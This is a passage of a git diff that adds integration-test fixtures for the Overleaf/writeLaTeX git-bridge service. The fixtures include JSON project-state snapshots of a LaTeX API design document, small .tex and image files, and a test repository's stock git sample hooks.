Project}\\n\\n\\\\begin{lstlisting}\\n# NB: JLM originally said PUT, but he now thinks POST is better\\n# NB: you must set a Content-Type: application/json header for this request\\n# in order to specify the data as JSON in the request body\\nPOST https://.../api/v0/docs/1826rqgsdb/snapshots\\nData:\\n{\\n latestVerId: integer,\\n files: [\\n {\\n name: string path (forward slashes, relative to root)\\n url: string (but only if the file is modified; else no url given)\\n }, ...\\n ]\\n postbackUrl: url to post result back to\\n}\\nResponse on success:\\n{\\n status: 202,\\n code: \\\"accepted\\\",\\n message: \\\"Accepted\\\"\\n}\\nResponse on out of date:\\n{\\n status: 409, # Conflict\\n code: \\\"outOfDate\\\",\\n message: \\\"Out of Date\\\"\\n}\\n\\nPostback Data (METHOD POST):\\nOn success:\\n{\\n code: \\\"upToDate\\\",\\n latestVerId: integer\\n}\\nOn out of date:\\n{\\n code: \\\"outOfDate\\\",\\n message: \\\"Out of Date\\\"\\n}\\nOn error:\\n{\\n code: \\\"invalidFile\\\",\\n TODO\\n}\\n\\\\end{lstlisting}\\n\\n\\\\section{Test Data}\\n\\nYou can use this project as one of your test projects. I've added an attachment and a file in a subfolder to make it a bit more interesting.\\n\\n\\\\input{foo/bar/test}\\n\\n\\\\includegraphics[width=\\\\linewidth]{min_mean_wait_evm_7_eps_150dpi}\\n\\n\\\\end{document}", + "path": "main.tex" + }, + { + "content": "This text is from another file.", + "path": "foo/bar/test.tex" + } + ], + "atts": [ + { + "url": "https://writelatex-staging.s3.amazonaws.com/filepicker/1ENnu6zJSGyslI3DuNZD_min_mean_wait_evm_7.eps.150dpi.png", + "path": "min_mean_wait_evm_7_eps_150dpi.png" + } + ] + }, + { + "versionID": 146, + "srcs": [ + { + "content": "\\\\documentclass[a4paper]{article}\\n\\n\\\\usepackage[english]{babel}\\n\\\\usepackage[utf8]{inputenc}\\n\\\\usepackage{graphicx}\\n\\\\usepackage{fullpage}\\n\\\\usepackage{listings}\\n\\\\usepackage{courier}\\n\\\\usepackage{url}\\n\\n\\\\lstset{basicstyle=\\\\ttfamily,breaklines=true}\\n\\n\\\\begin{document}\\n\\\\title{API for the writeLaTeX-Git Bridge}\\n\\\\author{JLM}\\n\\\\date{\\\\today}\\n\\\\maketitle\\n\\n\\\\section{Fetching a Project from WriteLaTeX}\\n\\nThere are three API calls that will likely be of interest. You can run them against this server, \\\\url{radiant-wind-3058.herokuapp.com}, but they're not on the production server yet.\\n\\n\\\\subsection{Get Doc}\\n\\nA ``doc'' is our internal term for a ``project''. At present, this just returns the latest version number.\\n\\n\\\\begin{lstlisting}\\nGET https://.../api/v0/docs/1826rqgsdb\\n# => { latestVerId: 39 }\\n\\\\end{lstlisting}\\n\\n\\\\subsection{Get Saved Vers}\\n\\nA ``saved ver'' is a version of a doc, saved by via the versions menu. Note that this query is not currently paginated.\\n\\n\\\\begin{lstlisting}\\nGET https://.../api/v0/docs/1826rqgsdb/saved_vers\\n# => [\\n {\\\"versionId\\\":39,\\n \\\"comment\\\":\\\"with more files\\\",\\n \\\"user\\\":{\\n \\\"email\\\":\\\"jdleesmiller@gmail.com\\\",\\n \\\"name\\\":\\\"John Lees-Miller\\\"},\\n \\\"createdAt\\\":\\\"2014-11-05T18:02:19Z\\\"},\\n {\\\"versionId\\\":24,\\n \\\"comment\\\":\\\"first draft\\\",\\n \\\"user\\\":{\\n \\\"email\\\":\\\"jdleesmiller@gmail.com\\\",\\n \\\"name\\\":\\\"John Lees-Miller\\\"},\\n \\\"createdAt\\\":\\\"2014-11-05T17:56:58Z\\\"}]\\n\\\\end{lstlisting}\\n\\n\\\\subsection{Get Snapshot for Version}\\n\\nA snapshot contains the content of a project in the given version. You can safely request a snapshot of any version that is, or was at any point in the last 24 hours, (1) a saved version, or (2) the current version. (Older versions may or may not have been moved to cold storage.)\\n\\nThe srcs array contains (content, file name) pairs; the atts array contains (URL, file name) pairs.\\n\\n\\\\begin{lstlisting}\\nGET https://.../api/v0/docs/1826rqgsdb/snapshots/39\\n# => {\\n \\\"srcs\\\":[\\n [\\\"This text is from another file.\\\",\\\"foo/bar/test.tex\\\"],\\n [\\\"\\\\\\\\documentclass[a4paper]{article}\\\\n...\\\",\\\"main.tex\\\"]],\\n \\\"atts\\\":[\\n [\\\"https://writelatex-staging.s3.amazonaws.com/filepicker/1ENnu6zJSGyslI3DuNZD_min_mean_wait_evm_7.eps.150dpi.png\\\",\\\"min_mean_wait_evm_7_eps_150dpi.png\\\"]]}\\n\\\\end{lstlisting}\\n\\n\\\\section{Pushing a Project to WriteLaTeX}\\n\\n\\\\subsection{Push a Project}\\n\\n\\\\begin{lstlisting}\\nPUT https://.../api/v0/docs/1826rqgsdb/snapshots\\nData:\\n{\\n latestVerId: integer,\\n files: [\\n {\\n name: string path (forward slashes, relative to root)\\n url: string (but only if the file is modified; else no url given)\\n }, ...\\n ]\\n postbackUrl: url to post result back to\\n}\\nResponse on success:\\n{\\n status: 20x,\\n}\\nResponse on out of date:\\n{\\n status: 40x,\\n code: \\\"outOfDate\\\",\\n message: \\\"Out of Date\\\"\\n}\\n\\nPostback Data (METHOD POST):\\nOn success:\\n{\\n code: \\\"upToDate\\\",\\n latestVerId: integer\\n}\\nOn out of date:\\n{\\n code: \\\"outOfDate\\\",\\n message: \\\"Out of Date\\\"\\n}\\nOn error:\\n{\\n code: \\\"invalidFile\\\",\\n TODO\\n}\\n\\\\end{lstlisting}\\n\\n\\\\section{Test Data}\\n\\nYou can use this project as one of your test projects. I've added an attachment and a file in a subfolder to make it a bit more interesting.\\n\\n\\\\input{foo/bar/test}\\n\\n\\\\includegraphics[width=\\\\linewidth]{min_mean_wait_evm_7_eps_150dpi}\\n\\n\\\\end{document}", + "path": "main.tex" + }, + { + "content": "This text is from another file.", + "path": "foo/bar/test.tex" + } + ], + "atts": [ + { + "url": "https://writelatex-staging.s3.amazonaws.com/filepicker/1ENnu6zJSGyslI3DuNZD_min_mean_wait_evm_7.eps.150dpi.png", + "path": "min_mean_wait_evm_7_eps_150dpi.png" + } + ] + }, + { + "versionID": 74, + "srcs": [ + { + "content": "\\\\documentclass[a4paper]{article}\\n\\n\\\\usepackage[english]{babel}\\n\\\\usepackage[utf8]{inputenc}\\n\\\\usepackage{graphicx}\\n\\\\usepackage{fullpage}\\n\\\\usepackage{listings}\\n\\\\usepackage{courier}\\n\\\\usepackage{url}\\n\\n\\\\lstset{basicstyle=\\\\ttfamily,breaklines=true}\\n\\n\\\\begin{document}\\n\\\\title{API for the writeLaTeX-Git Bridge}\\n\\\\author{JLM}\\n\\\\date{\\\\today}\\n\\\\maketitle\\n\\n\\\\section{Fetching a Project from WriteLaTeX}\\n\\nThere are three API calls that will likely be of interest. You can run them against this server, \\\\url{radiant-wind-3058.herokuapp.com}, but they're not on the production server yet.\\n\\n\\\\subsection{Get Doc}\\n\\nA ``doc'' is our internal term for a ``project''. At present, this just returns the latest version number.\\n\\n\\\\begin{lstlisting}\\nGET https://.../api/v0/docs/1826rqgsdb\\n# => { latestVerId: 39 }\\n\\\\end{lstlisting}\\n\\n\\\\subsection{Get Saved Vers}\\n\\nA ``saved ver'' is a version of a doc, saved by via the versions menu. Note that this query is not currently paginated.\\n\\n\\\\begin{lstlisting}\\nGET https://.../api/v0/docs/1826rqgsdb/saved_vers\\n# => [\\n {\\\"versionId\\\":39,\\n \\\"comment\\\":\\\"with more files\\\",\\n \\\"user\\\":{\\n \\\"email\\\":\\\"jdleesmiller@gmail.com\\\",\\n \\\"name\\\":\\\"John Lees-Miller\\\"},\\n \\\"createdAt\\\":\\\"2014-11-05T18:02:19Z\\\"},\\n {\\\"versionId\\\":24,\\n \\\"comment\\\":\\\"first draft\\\",\\n \\\"user\\\":{\\n \\\"email\\\":\\\"jdleesmiller@gmail.com\\\",\\n \\\"name\\\":\\\"John Lees-Miller\\\"},\\n \\\"createdAt\\\":\\\"2014-11-05T17:56:58Z\\\"}]\\n\\\\end{lstlisting}\\n\\n\\\\subsection{Get Snapshot for Version}\\n\\nA snapshot contains the content of a project in the given version. You can safely request a snapshot of any version that is, or was at any point in the last 24 hours, (1) a saved version, or (2) the current version. (Older versions may or may not have been moved to cold storage.)\\n\\nThe srcs array contains (content, file name) pairs; the atts array contains (URL, file name) pairs.\\n\\n\\\\begin{lstlisting}\\nGET https://.../api/v0/docs/1826rqgsdb/snapshots/39\\n# => {\\n \\\"srcs\\\":[\\n [\\\"This text is from another file.\\\",\\\"foo/bar/test.tex\\\"],\\n [\\\"\\\\\\\\documentclass[a4paper]{article}\\\\n...\\\",\\\"main.tex\\\"]],\\n \\\"atts\\\":[\\n [\\\"https://writelatex-staging.s3.amazonaws.com/filepicker/1ENnu6zJSGyslI3DuNZD_min_mean_wait_evm_7.eps.150dpi.png\\\",\\\"min_mean_wait_evm_7_eps_150dpi.png\\\"]]}\\n\\\\end{lstlisting}\\n\\n\\\\section{Pushing a Project to WriteLaTeX}\\n\\nTODO still working on this part\\n\\n\\\\section{Test Data}\\n\\nYou can use this project as a test project. I've added an attachment and a file in a subfolder to make it a bit more interesting.\\n\\n\\\\input{foo/bar/test}\\n\\n\\\\includegraphics[width=\\\\linewidth]{min_mean_wait_evm_7_eps_150dpi}\\n\\n\\\\end{document}", + "path": "main.tex" + }, + { + "content": "This text is from another file.", + "path": "foo/bar/test.tex" + } + ], + "atts": [ + { + "url": "https://writelatex-staging.s3.amazonaws.com/filepicker/1ENnu6zJSGyslI3DuNZD_min_mean_wait_evm_7.eps.150dpi.png", + "path": "min_mean_wait_evm_7_eps_150dpi.png" + } + ] + }, + { + "versionID": 39, + "srcs": [ + { + "content": "\\\\documentclass[a4paper]{article}\\n\\n\\\\usepackage[english]{babel}\\n\\\\usepackage[utf8]{inputenc}\\n\\\\usepackage{graphicx}\\n\\\\usepackage{fullpage}\\n\\\\usepackage{listings}\\n\\\\usepackage{courier}\\n\\\\usepackage{url}\\n\\n\\\\lstset{basicstyle=\\\\ttfamily,breaklines=true}\\n\\n\\\\begin{document}\\n\\\\title{API for the writeLaTeX-Git Bridge}\\n\\\\author{JLM}\\n\\\\date{\\\\today}\\n\\\\maketitle\\n\\n\\\\section{Fetching a Project from WriteLaTeX}\\n\\nThere are three API calls that will likely be of interest. You can run them against this server, \\\\url{radiant-wind-3058.herokuapp.com}, but they're not on the production server yet.\\n\\n\\\\subsection{Get Doc}\\n\\nA ``doc'' is our internal term for a ``project''. At present, this just returns the latest version number.\\n\\n\\\\begin{lstlisting}\\nGET https://.../api/v0/docs/1826rqgsdb\\n\\\\end{lstlisting}\\n\\n\\\\subsection{Get Saved Vers}\\n\\nA ``saved ver'' is a version of a doc, saved by via the versions menu. To list saved versions for a doc:\\n\\n\\\\begin{lstlisting}\\nGET https://.../api/v0/docs/1826rqgsdb/saved_vers\\n\\\\end{lstlisting}\\n\\n\\\\subsection{Get Snapshot for Version}\\n\\nA snapshot contains the content of a project in the given version. You can safely request a snapshot of any version that is, or was at any point in the last 24 hours, (1) a saved version, or (2) the current version. (Older versions may or may not have been moved to cold storage.)\\n\\n\\\\begin{lstlisting}\\nGET https://.../api/v0/docs/1826rqgsdb/snapshots/1\\n\\\\end{lstlisting}\\n\\n\\\\section{Pushing a Project to WriteLaTeX}\\n\\nTODO still working on this part\\n\\n\\\\section{Test Data}\\n\\nYou can use this project as a test project. I've added an attachment and a file in a subfolder to make it a bit more interesting.\\n\\n\\\\input{foo/bar/test}\\n\\n\\\\includegraphics[width=\\\\linewidth]{min_mean_wait_evm_7_eps_150dpi}\\n\\n\\\\end{document}", + "path": "main.tex" + }, + { + "content": "This text is from another file.", + "path": "foo/bar/test.tex" + } + ], + "atts": [ + { + "url": "https://writelatex-staging.s3.amazonaws.com/filepicker/1ENnu6zJSGyslI3DuNZD_min_mean_wait_evm_7.eps.150dpi.png", + "path": "min_mean_wait_evm_7_eps_150dpi.png" + } + ] + }, + { + "versionID": 24, + "srcs": [ + { + "content": "\\\\documentclass[a4paper]{article}\\n\\n\\\\usepackage[english]{babel}\\n\\\\usepackage[utf8]{inputenc}\\n\\\\usepackage{graphicx}\\n\\\\usepackage{fullpage}\\n\\\\usepackage{listings}\\n\\\\usepackage{courier}\\n\\\\usepackage{url}\\n\\n\\\\lstset{basicstyle=\\\\ttfamily,breaklines=true}\\n\\n\\\\begin{document}\\n\\\\title{API for the writeLaTeX-Git Bridge}\\n\\\\author{JLM}\\n\\\\date{\\\\today}\\n\\\\maketitle\\n\\n\\\\section{Fetching a Project from WriteLaTeX}\\n\\nThere are three API calls that will likely be of interest. You can run them against this server (radiant-wind-3058.herokuapp.com).\\n\\n\\\\subsection{Get Doc}\\n\\nA ``doc'' is our internal term for a ``project''. At present, this just returns the latest version number.\\n\\n\\\\begin{lstlisting}\\nGET https://radiant-wind.....com/api/v0/docs/1826rqgsdb\\n\\\\end{lstlisting}\\n\\n\\\\subsection{Get Saved Vers}\\n\\nA ``saved ver'' is a version of a doc, saved by via the versions menu. To list saved versions for a doc:\\n\\n\\\\begin{lstlisting}\\nGET https://radiant-wind.....com/api/v0/docs/1826rqgsdb/saved_vers\\n\\\\end{lstlisting}\\n\\n\\\\subsection{Get Snapshot for Version}\\n\\nA snapshot contains the content of a project in the given version. You can safely request a snapshot of any version that is, or was at any point in the last 24 hours, (1) a saved version, or (2) the current version. (Older versions may or may not have been moved to cold storage.)\\n\\n\\\\begin{lstlisting}\\nGET https://radiant-wind.....com/api/v0/docs/1826rqgsdb/snapshots/1\\n\\\\end{lstlisting}\\n\\n\\\\section{Pushing a Project to WriteLaTeX}\\n\\nTODO still working on this part\\n\\n\\\\section{Test Data}\\n\\nYou can use this project as a test project. Here is an extra file to make it a bit more interesting.\\n\\n\\\\includegraphics[width=\\\\linewidth]{min_mean_wait_evm_7_eps_150dpi}\\n\\n\\\\end{document}", + "path": "main.tex" + } + ], + "atts": [ + { + "url": "https://writelatex-staging.s3.amazonaws.com/filepicker/1ENnu6zJSGyslI3DuNZD_min_mean_wait_evm_7.eps.150dpi.png", + "path": "min_mean_wait_evm_7_eps_150dpi.png" + } + ] + } + ], + "push": "success", + "postback": { + "type": "success", + "versionID": 244 + } + } +] \ No newline at end of file diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/wlgbCanSwapProjects/state/111111111111111111111111/foo/bar/test.tex b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/wlgbCanSwapProjects/state/111111111111111111111111/foo/bar/test.tex new file mode 100644 index 0000000..046794f --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/wlgbCanSwapProjects/state/111111111111111111111111/foo/bar/test.tex @@ -0,0 +1 @@ +This text is from another file. \ No newline at end of file diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/wlgbCanSwapProjects/state/111111111111111111111111/main.tex b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/wlgbCanSwapProjects/state/111111111111111111111111/main.tex new file mode 100644 index 0000000..d95f3ad --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/wlgbCanSwapProjects/state/111111111111111111111111/main.tex @@ -0,0 +1 @@ +content diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/wlgbCanSwapProjects/state/111111111111111111111111/overleaf-white-410.png b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/wlgbCanSwapProjects/state/111111111111111111111111/overleaf-white-410.png new file mode 100644 index 0000000..6a23d10 Binary files /dev/null and b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/wlgbCanSwapProjects/state/111111111111111111111111/overleaf-white-410.png differ diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/wlgbCanSwapProjects/state/222222222222222222222222/editor-versions-a7e4de19d015c3e7477e3f7eaa6c418e.png b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/wlgbCanSwapProjects/state/222222222222222222222222/editor-versions-a7e4de19d015c3e7477e3f7eaa6c418e.png new file mode 100644 index 0000000..7fa339b Binary files /dev/null and b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/wlgbCanSwapProjects/state/222222222222222222222222/editor-versions-a7e4de19d015c3e7477e3f7eaa6c418e.png differ diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/wlgbCanSwapProjects/state/222222222222222222222222/foo/bar/test.tex b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/wlgbCanSwapProjects/state/222222222222222222222222/foo/bar/test.tex new file mode 100644 index 0000000..1c05c01 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/wlgbCanSwapProjects/state/222222222222222222222222/foo/bar/test.tex @@ -0,0 +1 @@ +a different one \ No newline at end of file diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/wlgbCanSwapProjects/state/222222222222222222222222/main.tex b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/wlgbCanSwapProjects/state/222222222222222222222222/main.tex new file mode 100644 index 0000000..802d4bb --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/wlgbCanSwapProjects/state/222222222222222222222222/main.tex @@ -0,0 +1 @@ +different content diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/wlgbCanSwapProjects/state/state.json b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/wlgbCanSwapProjects/state/state.json new file mode 100644 index 0000000..6c47055 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/wlgbCanSwapProjects/state/state.json @@ -0,0 +1,90 @@ +[ + { + "project": "111111111111111111111111", + "getDoc": { + "versionID": 1, + "createdAt": "2014-11-30T18:40:58.123Z", + "email": "jdleesmiller+1@gmail.com", + "name": "John+1" + }, + "getSavedVers": [ + { + "versionID": 1, + "comment": "added more info on doc GET and error details", + "email": "jdleesmiller+1@gmail.com", + "name": "John+1", + "createdAt": "2014-11-30T18:47:01.456Z" + } + ], + "getForVers": [ + { + "versionID": 1, + "srcs": [ + { + "content": "content\n", + "path": "main.tex" + }, + { + "content": "This text is from another file.", + "path": "foo/bar/test.tex" + } + ], + "atts": [ + { + "url": "http://127.0.0.1:3874/state/111111111111111111111111/overleaf-white-410.png", + "path": "overleaf-white-410.png" + } + ] + } + ], + "push": "success", + "postback": { + "type": "success", + "versionID": 2 + } + }, + { + "project": "222222222222222222222222", + "getDoc": { + "versionID": 1, + "createdAt": "2014-11-30T18:40:58.123Z", + "email": "jdleesmiller+1@gmail.com", + "name": "John+1" + }, + "getSavedVers": [ + { + "versionID": 1, + "comment": "added more info on doc GET and error details", + "email": "jdleesmiller+1@gmail.com", + "name": "John+1", + "createdAt": "2014-11-30T18:47:01.456Z" + } + ], + "getForVers": [ + { + "versionID": 1, + "srcs": [ + { + "content": "different content\n", + "path": "main.tex" + }, + { + "content": "a different one", + "path": "foo/bar/test.tex" + } + ], + "atts": [ + { + "url": "http://127.0.0.1:3874/state/222222222222222222222222/editor-versions-a7e4de19d015c3e7477e3f7eaa6c418e.png", + "path": "editor-versions-a7e4de19d015c3e7477e3f7eaa6c418e.png" + } + ] + } + ], + "push": "success", + "postback": { + "type": "success", + "versionID": 2 + } + } +] diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/.wlgb/wlgb.db b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/.wlgb/wlgb.db new file mode 100644 index 0000000..e69de29 diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/idontexist/idontexist.txt b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/idontexist/idontexist.txt new file mode 100644 index 0000000..e69de29 diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj1/DOTgit/COMMIT_EDITMSG b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj1/DOTgit/COMMIT_EDITMSG new file mode 100644 index 0000000..c098216 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj1/DOTgit/COMMIT_EDITMSG @@ -0,0 +1 @@ +Main diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj1/DOTgit/HEAD b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj1/DOTgit/HEAD new file mode 100644 index 0000000..cb089cd --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj1/DOTgit/HEAD @@ -0,0 +1 @@ +ref: refs/heads/master diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj1/DOTgit/config b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj1/DOTgit/config new file mode 100644 index 0000000..6c9406b --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj1/DOTgit/config @@ -0,0 +1,7 @@ +[core] + repositoryformatversion = 0 + filemode = true + bare = false + logallrefupdates = true + ignorecase = true + precomposeunicode = true diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj1/DOTgit/description b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj1/DOTgit/description new file mode 100644 index 0000000..498b267 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj1/DOTgit/description @@ -0,0 +1 @@ +Unnamed repository; edit this file 'description' to name the repository. diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj1/DOTgit/hooks/applypatch-msg.sample b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj1/DOTgit/hooks/applypatch-msg.sample new file mode 100755 index 0000000..a5d7b84 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj1/DOTgit/hooks/applypatch-msg.sample @@ -0,0 +1,15 @@ +#!/bin/sh +# +# An example hook script to check the commit log message taken by +# applypatch from an e-mail message. +# +# The hook should exit with non-zero status after issuing an +# appropriate message if it wants to stop the commit. The hook is +# allowed to edit the commit message file. +# +# To enable this hook, rename this file to "applypatch-msg". + +. git-sh-setup +commitmsg="$(git rev-parse --git-path hooks/commit-msg)" +test -x "$commitmsg" && exec "$commitmsg" ${1+"$@"} +: diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj1/DOTgit/hooks/commit-msg.sample b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj1/DOTgit/hooks/commit-msg.sample new file mode 100755 index 0000000..b58d118 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj1/DOTgit/hooks/commit-msg.sample @@ -0,0 +1,24 @@ +#!/bin/sh +# +# An example hook script to check the commit log message. +# Called by "git commit" with one argument, the name of the file +# that has the commit message. The hook should exit with non-zero +# status after issuing an appropriate message if it wants to stop the +# commit. The hook is allowed to edit the commit message file. +# +# To enable this hook, rename this file to "commit-msg". + +# Uncomment the below to add a Signed-off-by line to the message. +# Doing this in a hook is a bad idea in general, but the prepare-commit-msg +# hook is more suited to it. +# +# SOB=$(git var GIT_AUTHOR_IDENT | sed -n 's/^\(.*>\).*$/Signed-off-by: \1/p') +# grep -qs "^$SOB" "$1" || echo "$SOB" >> "$1" + +# This example catches duplicate Signed-off-by lines. + +test "" = "$(grep '^Signed-off-by: ' "$1" | + sort | uniq -c | sed -e '/^[ ]*1[ ]/d')" || { + echo >&2 Duplicate Signed-off-by lines. + exit 1 +} diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj1/DOTgit/hooks/post-update.sample b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj1/DOTgit/hooks/post-update.sample new file mode 100755 index 0000000..ec17ec1 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj1/DOTgit/hooks/post-update.sample @@ -0,0 +1,8 @@ +#!/bin/sh +# +# An example hook script to prepare a packed repository for use over +# dumb transports. +# +# To enable this hook, rename this file to "post-update". + +exec git update-server-info diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj1/DOTgit/hooks/pre-applypatch.sample b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj1/DOTgit/hooks/pre-applypatch.sample new file mode 100755 index 0000000..4142082 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj1/DOTgit/hooks/pre-applypatch.sample @@ -0,0 +1,14 @@ +#!/bin/sh +# +# An example hook script to verify what is about to be committed +# by applypatch from an e-mail message. +# +# The hook should exit with non-zero status after issuing an +# appropriate message if it wants to stop the commit. +# +# To enable this hook, rename this file to "pre-applypatch". + +. git-sh-setup +precommit="$(git rev-parse --git-path hooks/pre-commit)" +test -x "$precommit" && exec "$precommit" ${1+"$@"} +: diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj1/DOTgit/hooks/pre-commit.sample b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj1/DOTgit/hooks/pre-commit.sample new file mode 100755 index 0000000..68d62d5 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj1/DOTgit/hooks/pre-commit.sample @@ -0,0 +1,49 @@ +#!/bin/sh +# +# An example hook script to verify what is about to be committed. +# Called by "git commit" with no arguments. The hook should +# exit with non-zero status after issuing an appropriate message if +# it wants to stop the commit. +# +# To enable this hook, rename this file to "pre-commit". + +if git rev-parse --verify HEAD >/dev/null 2>&1 +then + against=HEAD +else + # Initial commit: diff against an empty tree object + against=4b825dc642cb6eb9a060e54bf8d69288fbee4904 +fi + +# If you want to allow non-ASCII filenames set this variable to true. +allownonascii=$(git config --bool hooks.allownonascii) + +# Redirect output to stderr. +exec 1>&2 + +# Cross platform projects tend to avoid non-ASCII filenames; prevent +# them from being added to the repository. We exploit the fact that the +# printable range starts at the space character and ends with tilde. +if [ "$allownonascii" != "true" ] && + # Note that the use of brackets around a tr range is ok here, (it's + # even required, for portability to Solaris 10's /usr/bin/tr), since + # the square bracket bytes happen to fall in the designated range. + test $(git diff --cached --name-only --diff-filter=A -z $against | + LC_ALL=C tr -d '[ -~]\0' | wc -c) != 0 +then + cat <<\EOF +Error: Attempt to add a non-ASCII file name. + +This can cause problems if you want to work with people on other platforms. + +To be portable it is advisable to rename the file. + +If you know what you are doing you can disable this check using: + + git config hooks.allownonascii true +EOF + exit 1 +fi + +# If there are whitespace errors, print the offending file names and fail. +exec git diff-index --check --cached $against -- diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj1/DOTgit/hooks/pre-push.sample b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj1/DOTgit/hooks/pre-push.sample new file mode 100755 index 0000000..6187dbf --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj1/DOTgit/hooks/pre-push.sample @@ -0,0 +1,53 @@ +#!/bin/sh + +# An example hook script to verify what is about to be pushed. Called by "git +# push" after it has checked the remote status, but before anything has been +# pushed. If this script exits with a non-zero status nothing will be pushed. +# +# This hook is called with the following parameters: +# +# $1 -- Name of the remote to which the push is being done +# $2 -- URL to which the push is being done +# +# If pushing without using a named remote those arguments will be equal. +# +# Information about the commits which are being pushed is supplied as lines to +# the standard input in the form: +# +# <local ref> <local sha1> <remote ref> <remote sha1> +# +# This sample shows how to prevent push 